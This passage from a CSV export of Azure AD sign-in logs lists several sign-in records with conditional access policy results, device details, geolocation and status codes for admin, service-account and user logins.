'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:19,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",94481b56-6f72-4a0d-b77c-172126153400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,94481b56-6f72-4a0d-b77c-172126153400,SigninLogs,Sucess,32.32146072,34.85319901
+1733,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:07.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f4868e75-f881-47b6-b080-3adf2ba03e49,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 06:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e1e7e006-7b3d-4bd9-87b2-47b4aa7f0a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e1e7e006-7b3d-4bd9-87b2-47b4aa7f0a00,SigninLogs,Sucess,50.6406517,5.572050095
+1734,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d751bb85-e820-4c12-adf1-c0f528ecca0d,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 05:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b3c0863d-787e-45d0-a1b5-da54acc70a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b3c0863d-787e-45d0-a1b5-da54acc70a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1735,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:07.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f4868e75-f881-47b6-b080-3adf2ba03e49,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 06:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e1e7e006-7b3d-4bd9-87b2-47b4aa7f0a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e1e7e006-7b3d-4bd9-87b2-47b4aa7f0a00,SigninLogs,Sucess,50.6406517,5.572050095
+1736,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:11.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,019e3dae-58b8-4282-8b43-31578aba77c7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 05:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d3b25eb5-284d-4091-85e8-2c115f280b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d3b25eb5-284d-4091-85e8-2c115f280b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1737,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:09.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,427e7c41-eed2-4231-bed1-38231b4e2b40,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 06:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8ad00b2e-7523-45f8-a6db-5c4732520b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8ad00b2e-7523-45f8-a6db-5c4732520b00,SigninLogs,Sucess,50.6406517,5.572050095
+1738,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:04.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50058,None,The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.,0,f4868e75-f881-47b6-b080-3adf2ba03e49,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 06:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",6ab139a2-776a-491f-a231-a5750b620d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50058, 'additionalDetails': 'MFA requirement satisfied by claim in the token', 'failureReason': 'The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,6ab139a2-776a-491f-a231-a5750b620d00,SigninLogs,Failed,50.6406517,5.572050095
+1739,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:09.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,427e7c41-eed2-4231-bed1-38231b4e2b40,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 06:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8ad00b2e-7523-45f8-a6db-5c4732520b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8ad00b2e-7523-45f8-a6db-5c4732520b00,SigninLogs,Sucess,50.6406517,5.572050095
+1740,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:45.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1dac5086-7e1c-461a-abd7-4c7374f02375,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 